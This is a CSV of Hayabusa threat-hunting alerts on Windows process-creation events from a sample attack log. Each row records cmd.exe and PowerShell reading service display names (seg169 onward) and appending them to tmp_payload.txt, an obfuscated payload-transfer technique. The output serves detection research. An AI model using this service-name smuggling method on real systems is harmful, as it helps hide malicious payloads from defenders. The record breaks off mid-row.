2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:33.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:34.682 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:36.138 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:37.638 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:39.090 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.532 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:40.547 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:41.996 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:43.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.878 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:44.893 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 
| User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 